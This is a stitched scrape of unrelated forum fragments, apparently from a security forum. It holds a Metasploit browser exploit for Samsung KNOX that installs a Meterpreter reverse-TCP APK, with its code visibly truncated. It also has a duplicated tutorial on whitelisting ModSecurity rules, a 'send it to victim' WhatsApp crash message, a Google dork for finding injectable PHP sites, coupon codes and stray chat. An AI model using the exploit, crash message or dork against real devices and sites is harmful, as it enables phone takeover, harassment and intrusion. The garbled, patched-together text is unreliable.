require 'digest/md5'
class Metasploit3 < Msf::Exploit::Remote
include Msf::Exploit::Remote::BrowserExploitServer
# Hash that maps payload ID -> (0|1) if an HTTP request has
# been made to download a payload of that ID
attr_reader :served_payloads
def initialize(info = {})
super(update_info(info,
'Name' => 'Samsung Galaxy KNOX Android Browser RCE',
'Description' => %q{
A vulnerability exists in the KNOX security component of the Samsung Galaxy
firmware that allows a remote webpage to install an APK with arbitrary
permissions by abusing the 'smdm://' protocol handler registered by the KNOX
component.
The vulnerability has been confirmed in the Samsung Galaxy S4, S5, Note 3,
and Ace 4.
},
'License' => MSF_LICENSE,
'Author' => [
'Andre Moulu', # discovery and advisory
'joev' # msf module
],
'References' => [
['URL', 'http://blog.quarkslab.com/abusing-samsung-knox-to-remotely-install-a-malicious-application-story-of-a-half-patched-vulnerability.html'],
['OSVDB', '114590']
],
'Platform' => 'android',
'Arch' => ARCH_DALVIK,
'DefaultOptions' => { 'PAYLOAD' => 'android/meterpreter/reverse_tcp' },
'Targets' => [ [ 'Automatic', {} ] ],
'DisclosureDate' => 'Nov 12 2014',
'DefaultTarget' => 0,
'BrowserRequirements' => {
:source => 'script',
:os_name => OperatingSystems::Match::ANDROID
}
))
register_options([
OptString.new('APK_VERSION', [
false, "The update version to advertise to the client", "1337"
])
], self.class)
deregister_options('JsObfuscate')
end
def exploit
@served_payloads[req.qstring['id']].to_s, 'Content-type' => 'text/plain')
elsif req.uri =~ /launch$/
send_response_html(cli, launch_html)
else
super
end
end
# The browser appears to be vulnerable, serve the exploit
def on_request_exploit(cli, req, browser)
print_status "Serving exploit..."
send_response_html(cli, generate_html)
end
def magic_headers
{ 'Content-Length' => apk_bytes.length,
'ETag' => Digest::MD5.hexdigest(apk_bytes),
'x-amz-meta-apk-version' => datastore['APK_VERSION'] }
end
def generate_html
%Q|
<!doctype html>
<html><body>
<script>
#{exploit_js}
</script></body></html>
|
end
def exploit_js
payload_id = rand_word
js_obfuscate %Q|
function poll() {
var xhr = new XMLHttpRequest();
xhr.open('GET', '_poll?id=#{payload_id}&d='+Math.random()*999999999999);
xhr.onreadystatechange = function(){
if (xhr.readyState == 4) {
if (xhr.responseText == '1') {
setTimeout(killEnrollment, 100);
} else {
setTimeout(poll, 1000);
setTimeout(enroll, 0);
setTimeout(enroll, 500);
}
}
};
xhr.onerror = function(){
setTimeout(poll, 1000);
setTimeout(enroll, 0);
};
xhr.send();
}
function enroll() {
var loc = window.location.href.replace(/[/.]$/g, '');
top.location = 'smdm://#{rand_word}?update_url='+
encodeURIComponent(loc)+'/#{payload_id}.apk';
}
function killEnrollment() {
top.location = "intent://#{rand_word}?program="+
"#{rand_word}/#Intent;scheme=smdm;launchFlags=268468256;end";
setTimeout(launchApp, 300);
}
function launchApp() {
top.location='intent:view#Intent;SEL;component=com.metasploit.stage/.MainActivity;end';
}
enroll();
setTimeout(poll,600);
|
end
def rand_word
Rex::Text.rand_text_alphanumeric(3+rand(12))
end
end -
ps4. 8gb ram , 8 core-uri
-
Stiu ca e vechi dar mna' , poate stie cineva.
Deci problema sta in felu urmator : Sa se scrie un program in care sa afiseze din "*" un triunghi dreptunghic
*
**
***
****
*****
******
*******
-
Nu stiu , posibil what's app are un fisier de preia log-urile..
-
We have already discussed in my previous articles how to configure Mod Security Firewall with OWASP rules and also analysed the different types of logs which Mod Security generates. While analysing the logs, we have seen that the OWASP rules generate a lot of false positive results, as these rules are standard and not application-friendly. We need to edit the default rules in order to eliminate the false positive results. We can do this by creating the white-list rules according to the application’s requirement. So, in this article we will discuss different types of techniques for writing the white-listing rules for Mod Security.
We will write all the white-list rules in the whitelist.conf file, as we have already configured this file with Mod Security in previous articles, so we don’t need to create another file. Just open the whitelist.conf file in any editor. The path of the whitelist.conf file is following.
/etc/httpd/modsecurity.d/whitelist.conf
NOTE: The path of the white-list file is not same in all cases. It depends on the configuration of Mod Security. You can read the previous articles for the configuration details. The URLs of the previous articles are given below:
Configuring the ModSecurity Firewall with OWASP Rules - InfoSec Institute
Analyzing the Mod Security Logs - InfoSec Institute
White-List or Remove the Rule on the Basis of the Rule ID
Every rule in Mod Security is identified by the Rule ID. We will use this ID to white-list the rule. Let’s look into the rule ID for the following error log which was generated by Mod Security.
In the above screenshot, we can see the Rule ID. Now, we can create the rules on the basis of this ID. This can be done by adding the rule in the whitelist.conf file. Open the whitelist.conf file in VIM editor.
After the above step, we can see the following details in the file.
These are the white-list configuration settings of Mod Security. We are not discussing the settings, as we have already discussed this in a previous article. Now, we will add the following lines in the end of the file for white-listing the rule.
# Remove Mod Security Rules
<LocationMatch .*>
<IfModule mod_security2.c>
SecRuleRemoveById 960017
</IfModule>
</LocationMatch>
Download & Resources
Sign up for our newsletter to get the latest updates.
View our FREE mini-courses!
View our FREE mini-courses!
Discounted Boot Camps
Avoiding Mod Security False Positives with White-listing
3
inShare
We have already discussed in my previous articles how to configure Mod Security Firewall with OWASP rules and also analysed the different types of logs which Mod Security generates. While analysing the logs, we have seen that the OWASP rules generate a lot of false positive results, as these rules are standard and not application-friendly. We need to edit the default rules in order to eliminate the false positive results. We can do this by creating the white-list rules according to the application’s requirement. So, in this article we will discuss different types of techniques for writing the white-listing rules for Mod Security.
We will write all the white-list rules in the whitelist.conf file, as we have already configured this file with Mod Security in previous articles, so we don’t need to create another file. Just open the whitelist.conf file in any editor. The path of the whitelist.conf file is following.
/etc/httpd/modsecurity.d/whitelist.conf
NOTE: The path of the white-list file is not same in all cases. It depends on the configuration of Mod Security. You can read the previous articles for the configuration details. The URLs of the previous articles are given below:
Configuring the ModSecurity Firewall with OWASP Rules - InfoSec Institute
Analyzing the Mod Security Logs - InfoSec Institute
White-List or Remove the Rule on the Basis of the Rule ID
Every rule in Mod Security is identified by the Rule ID. We will use this ID to white-list the rule. Let’s look into the rule ID for the following error log which was generated by Mod Security.
In the above screenshot, we can see the Rule ID. Now, we can create the rules on the basis of this ID. This can be done by adding the rule in the whitelist.conf file. Open the whitelist.conf file in VIM editor.
After the above step, we can see the following details in the file.
These are the white-list configuration settings of Mod Security. We are not discussing the settings, as we have already discussed this in a previous article. Now, we will add the following lines in the end of the file for white-listing the rule.
1
2
3
4
5
6
# Remove Mod Security Rules
<LocationMatch .*>
<IfModule mod_security2.c>
SecRuleRemoveById 960017
</IfModule>
</LocationMatch>
Now, save this file and restart the Apache server. Every time we make any changes in the configuration of Mod Security, we must restart the Apache service to start the rules with Mod Security. The meaning of each marked line is explained in the below section.
The LocationMatch directive creates a location specific configuration context. As of now we are using “.*” which means this rule will work in the entire application. We can also give a particular file name for creating the rule. For example, we have file name auth.php which is generating the error and the rule ID of the error is 45345. So, the white-list rule of the error is:
<LocationMatchauth.php>
<IfModule mod_security2.c>
SecRuleRemoveById 960017
</IfModule>
</LocationMatch>So we can create rules on the basis of the rule ID according to the requirement.
This is the Mod Security module. All rules will be created inside this tag.
The SecRuleRemoveById directive is used to remove a rule according to rule ID. The rule ID can be seen in the Mod Security error log. We can also define the multiple rule IDs separated by a comma, or we can also give the rule range. For example, if we want to white-list all the rules that fall between 400 and 500, we can write SecRuleRemoveByID “400-600?.
White-List or Remove the Rule on the Basis of Error Messages
We can also white-list the rules on the basis of error messages. Let us look into the following error.
We can see the message “Host Header is a Numeric IP Address” in the error log. Thos type of error message comes when the website is accessed through the IP address. Let us white-list this rule.
We can white-list this rule by the SecRuleRemoveByMsg directive. It will white-list the rule according to the error Message. Add the following lines in the whitelist.conf file.
<LocationMatch .*>
<IfModule mod_security2.c>
SecRuleRemoveByMsg "Host header is a numeric IP address"
</IfModule>
</LocationMatch>
Each marked line in the above screenshot is explained in the below section:
<LocationMatch .*> means this rule will disable Mod Security throughout the application. We can add this rule on a particular path also.
In the double quote we can give the message which will be whitelisted by the firewall.
Hence, there are the so many directives which can be used to whitelist the rules. We need to carefully read the error logs, then we can easily create the white rules. We can see all directive details on the SpiderLags Website.
et us consider the example given below:
Disable Mod Security Firewall on a URL
Sometimes there are situations in which we need to disable the firewall on a particular URL. Let us suppose in a website we have a file upload.php in the upload folder. We can white-list this file by adding the following lines of code.
<LocationMatch /upload/upload.php>
<IfModule mod_security2.c>
SecRuleEngine Off
</IfModule>
</LocationMatch>
These lines are explained below:
LocationMatch is the directive which is used to match the particular location file or folder location on the server. Here, we are defining the location /DVWA/setup.php file.
This directive is used to disable Mod Security in the location which is defined in the above line. Here, we have set it as off. It means that whatever functionality is working on this file, it will not be blocked or logged into the Mod Security error log. We can also set other options as per the requirement with the directive.
There are so many other rules which can be created according to the requirement.
References:
1~ https://www.atomicorp.com/wiki/index.php/Mod_security
2~ https://github.com/SpiderLabs/ModSecurity/wiki/ModSecurity-Frequently-Asked-Questions-(FAQ)
2~ https://github.com/SpiderLabs/ModSecurity/wiki/Reference-Manual
Source: Avoiding Mod Security False Positives with White-listing - InfoSec Institute
-
step 1. copy this code and send it to victim .
??? ?? ?? ?? ?????? ?? ????
?? ?? ?? ?????? ?? ???? ?? ?? ?? ?
????? ?? ???? ?? ?? ?? ?????? ?? ?
??? ?? ?? ?? ?????? ?? ???? ?? ??
?? ?????? ?? ???? ?? ?? ?? ??????
?? ???? ?? ?? ?? ?????? ?? ???? ?
? ?? ?? ?????? ?? ???? ?? ?? ?? ??
???? ?? ???? ?? ?? ?? ?????? ?? ??
?? ?? ?? ?? ?????? ?? ???? ?? ?? ?
? ?????? ?? ???? ?? ?? ?? ?????? ?
? ???? ?? ?? ?? ?????? ?? ???? ??
?? ?? ?????? ?? ???? ?? ?? ?? ????
?? ?? ???? ?? ?? ?? ?????? ?? ???
? ?? ?? ?? ?????? ?? ???? ?? ?? ?
? ?????? ?? ???? ?? ?? ?? ?????? ?
? ???? ?? ?? ?? ?????? ?? ???? ??
?? ?? ?????? ?? ???? ?? ?? ?? ????
?? ?? ???? ?? ?? ?? ?????? ?? ???
? ?? ?? ?? ?????? ?? ???? ?? ?? ?
? ?????? ?? ???? ?? ?? ?? ?????? ?
? ???? ?? ?? ?? ?????? ?? ???? ??
?? ?? ?????? ?? ???? ?? ?? ?? ????
?
?? ?? ???? ?? ?? ?? ?????? ?? ???
? ?? ?? ?? ?????? ?? ???? ?? ?? ?
? ?????? ?? ???? ?? ?? ?? ?????? ?
? ???? ?? ?? ?? ?????? ?? ???? ??
?? ?? ?????? ?? ???? ?? ?? ?? ????
?? ?? ???? ?? ?? ?? ?????? ?? ???
? ?? ?? ?? ?????? ?? ???? ?? ?? ?
? ?????? ?? ???? ?? ?? ?? ?????? ?
? ???? ?? ?? ?? ?????? ?? ???? ??
?? ?? ?????? ?? ???? ?? ?? ?? ????
?? ?? ???? ?? ?? ?? ?????? ?? ???
? ?? ?? ?? ?????? ?? ???? ?? ?? ?
? ?????? ?? ???? ?? ?? ?? ?????? ?
? ???? ?? ?? ?? ?????? ?? ???? ??
?? ?? ?????? ?? ???? ?? ?? ?? ????
?? ?? ???? ?? ?? ?? ?????? ?? ???
? ?? ?? ?? ?????? ?? ???? ?? ?? ?
? ?????? ?? ???? ?? ?? ?? ?????? ?
? ???? ?? ?? ?? ?????? ?? ???? ??
?? ?? ?????? ?? ???? ?? ?? ?? ????
?? ?? ???? ?? ?? ?? ?????? ?? ???
? ?? ?? ?? ?????? ?? ???? ?? ?? ?
? ?????? ?? ???? ?? ?? ?? ?????? ?
? ???? ?? ?? ?? ?????? ?? ???? ??
?? ?? ?????? ?? ???? ?? ?? ?? ????
?? ?? ???? ?? ?? ?? ?????? ?? ???
? ?? ?? ?? ?????? ?? ???? ?? ?? ?
? ?????? ?? ???? ?? ?? ?? ?????? ?
? ???? ?? ?? ?? ?????? ?? ???? ??
?? ?? ?????? ?? ???? ?? ?? ?? ????
?? ?? ???? ?? ?? ?? ?????? ?? ???
? ?? ?? ?? ?????? ?? ???? ?? ?? ?
? ?????? ?? ???? ?? ?? ?? ?????? ?
? ???? ?? ?? ?? ?????? ?? ???? ??
?? ?? ?????? ?? ???? ?? ?? ?? ????
?? ?? ???? ?? ?? ?? ?????? ?? ???
? ?? ?? ?? ?????? ?? ???? ?? ?? ?
? ?????? ?? ???? ?? ?? ?? ?????? ?
? ??step 2. And done . they can not open there whatsapp until they delete your conversation ,
-
Coupon Code 1: EDM20 ($3 Off $20 or More)
Coupon COde 2: EDM30 ($5 Off $30 or More)
Coupon COde 3: EDM50 ($9 Off $50 or More)
Coupon COde 4: EDM80 ($16 Off $80 or More)
Coupon COde 5: EDM100 ($22 Off $100 or More)
Coupon COde 6: EDM200 ($47 Off $200 or More)
Coupon COde 7: EDM300 ($70 Off $300 or More) -
SSS257XCG6RL
-
e tot down...
-
inurl:php?id= site:it
-
@-Magus- e carder , e venit dupa Altenen(ATN)!
-
Salut , si bine ai venit.
-
10 euro paypal!
-
[XSS] Ask.com
in XSS (cross site scripting)
Posted
Nu am copiat de pe nimic l-am gasit azi